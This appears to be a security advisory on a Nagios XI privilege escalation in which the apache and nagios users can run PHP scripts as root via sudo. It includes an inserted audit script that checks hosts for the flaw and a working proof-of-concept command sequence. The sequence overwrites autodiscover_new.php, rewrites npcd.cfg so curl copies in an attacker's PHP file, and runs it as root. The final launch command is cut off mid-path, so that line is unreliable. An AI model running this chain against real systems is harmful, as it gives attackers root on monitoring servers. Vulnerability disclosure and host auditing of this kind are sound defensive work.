/usr/local/nagiosxi/scripts/autodiscover_new.php can be run via sudo by low-privileged users (nagios and apache), ultimately allowing arbitrary PHP code to be executed with root privileges
The apache user can run autodiscover_new.php via sudo
    User_Alias NAGIOSXI=nagios
    User_Alias NAGIOSXIWEB=apache
    NAGIOSXI ALL=NOPASSWD:/usr/bin/php /usr/local/nagiosxi/scripts/
    NAGIOSXIWEB ALL=NOPASSWD:/usr/bin/php /usr/local/nagiosxi/scripts/
This means the nagios and apache users can run this file with root privileges. The nagios user can also use it to change the permissions of root-owned files so that they become writable; the nagios user can therefore overwrite autodiscover_new.php and change its permissions to grant write access, which lets the nagios user edit autodiscover_new.php.
The npcd service runs as the nagios user, but the apache user can also write to its configuration file, which lets it specify a custom binary and arguments to run:
    # ps aux | grep npcd
    nagios  10290  0.0  0.3  71248  1004 ?  14:14  /usr/local/nagios/bin/npcd -f /usr/local/nagios/etc/pnp/npcd.cfg
    # ls -l /usr/local/nagios/etc/pnp/npcd.cfg
    -rw-rw-r-- 1 nagios apache 3090 Sep 3 13:02 /usr/local/nagios/etc/pnp/npcd.cfg
The apache user can manage the npcd service using /usr/local/nagiosxi/scripts/manage_services.sh:
    User_Alias NAGIOSXI=nagios
    User_Alias NAGIOSXIWEB=apache
    NAGIOSXIWEB ALL=NOPASSWD:/usr/local/nagiosxi/scripts/manage_services.sh *
Ultimately, the apache user has the rights to modify npcd's launch configuration so that autodiscover_new.php is rewritten and then executed with elevated privileges via sudo. This local privilege escalation can be chained with the web vulnerability.
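To check a host for the three conditions this chain depends on (a NOPASSWD sudo rule for php over the scripts directory, a group-writable npcd.cfg, and an npcd run command pointing outside the expected helper directory), here is an added POSIX shell audit script; it is not part of the advisory, the "expected" paths in EXPECTED_RUN_CMD_DIR and EXPECTED_SPOOL_DIR are assumptions for a default Nagios XI layout, and the sample sudoers and npcd.cfg text is constructed so the checks run offline.

```shell
#!/bin/sh
# Audit helpers for the chain above: a NOPASSWD sudo rule for php over the scripts
# directory, a group-writable npcd.cfg, and an npcd run command outside the expected
# helper directory. Expected paths are assumptions for a default layout; adjust them.
EXPECTED_RUN_CMD_DIR=/usr/local/nagios/libexec   # assumed home of process_perfdata.pl
EXPECTED_SPOOL_DIR=/usr/local/nagios/var         # assumed perfdata spool parent

# Constructed sample inputs so the checks can be exercised offline.
SAMPLE_SUDOERS='User_Alias NAGIOSXIWEB=apache
NAGIOSXIWEB ALL=NOPASSWD:/usr/bin/php /usr/local/nagiosxi/scripts/'
SAMPLE_NPCD_CFG='user = nagios
perfdata_spool_dir = /usr/local/nagiosxi/scripts/components/
perfdata_file_run_cmd = /usr/bin/curl'

# sudoers_php_nopasswd TEXT: 0 if any rule runs php under /usr/local/nagiosxi/scripts/ without a password.
sudoers_php_nopasswd() {
    printf '%s\n' "$1" | grep -Eq 'NOPASSWD:[[:space:]]*/usr/bin/php[[:space:]]+/usr/local/nagiosxi/scripts/'
}

# npcd_cfg_findings TEXT: prints one line per suspicious setting; returns the number of findings.
npcd_cfg_findings() {
    n=0
    cmd=$(printf '%s\n' "$1" | sed -n 's/^perfdata_file_run_cmd[[:space:]]*=[[:space:]]*//p')
    spool=$(printf '%s\n' "$1" | sed -n 's/^perfdata_spool_dir[[:space:]]*=[[:space:]]*//p')
    case "$cmd" in
        "$EXPECTED_RUN_CMD_DIR"/*) ;;
        *) echo "perfdata_file_run_cmd='$cmd' is not under $EXPECTED_RUN_CMD_DIR"; n=$((n + 1)) ;;
    esac
    case "$spool" in
        "$EXPECTED_SPOOL_DIR"/*) ;;
        *) echo "perfdata_spool_dir='$spool' is not under $EXPECTED_SPOOL_DIR"; n=$((n + 1)) ;;
    esac
    return $n
}

# group_writable FILE: 0 if the group write bit is set (the npcd.cfg condition shown above).
group_writable() {
    perms=$(ls -ld "$1" 2>/dev/null | cut -c1-10)
    [ "$(printf '%s' "$perms" | cut -c6)" = "w" ]
}

if sudoers_php_nopasswd "$SAMPLE_SUDOERS"; then echo "sudoers: php over scripts/ without a password"; fi
npcd_cfg_findings "$SAMPLE_NPCD_CFG" || true
for f in /etc/sudoers /usr/local/nagios/etc/pnp/npcd.cfg; do
    if [ -e "$f" ] && group_writable "$f"; then echo "$f is group-writable"; fi
done
```

On a real host, feed the functions the contents of /etc/sudoers (and /etc/sudoers.d/*) and /usr/local/nagios/etc/pnp/npcd.cfg instead of the constructed samples.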
Proof of Concept
Note: the PoC will clobber /usr/local/nagiosxi/scripts/components/autodiscover_new.php. As the nagios or apache user (for example via the web exploit), run the following commands:
    # overwrite autodiscover_new.php; this will also modify its permissions to be writable by nagios
    # will take a moment to complete
    sudo /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php --addresses=127.0.0.1/1 --output=/usr/local/nagiosxi/scripts/components/autodiscover_new.php
    # stop npcd service
    sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
    # write to config file
    # note the use of curl to copy the file's contents to the vulnerable autodiscover_new.php
    echo -e "user = nagios\ngroup = nagios\nlog_type = file\nlog_file = /usr/local/nagios/var/npcd.log\nmax_logfile_size = 10485760\nlog_level = 0\nperfdata_spool_dir = /usr/local/nagiosxi/scripts/components/\nperfdata_file_run_cmd = /usr/bin/curl\nperfdata_file_run_cmd_args = file:///usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/autodiscover_new.php -o /usr/local/nagiosxi/scripts/components/autodiscover_new.php\nnpcd_max_threads = 5\nsleep_time = 15\nload_threshold = 10.0\npid_file=/usr/local/nagiosxi/var/subsys/npcd.pid\n\n# scrappy" > /usr/local/nagios/etc/pnp/npcd.cfg
    # write new autodiscover_new.php file
    # note that this is a different autodiscover_new.php than the script containing the vuln
    # this file's contents are copied once npcd launches
    echo -e "\x3c\x3fphp system('whoami'); \x3f\x3e" > /usr/local/nagiosxi/html/includes/components/autodiscovery/jobs/autodiscover_new.php
    # start service
    sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
    # launch
    sudo /usr/bin/php /usr/
The screenshot below shows the PoC being run from inside a PHP file (simulating execution as part of the chained web exploit). The initial call to whoami shows that the code starts out running as apache.
The output at the end contains 'root', indicating that the autodiscover_new.php script was executed with root privileges.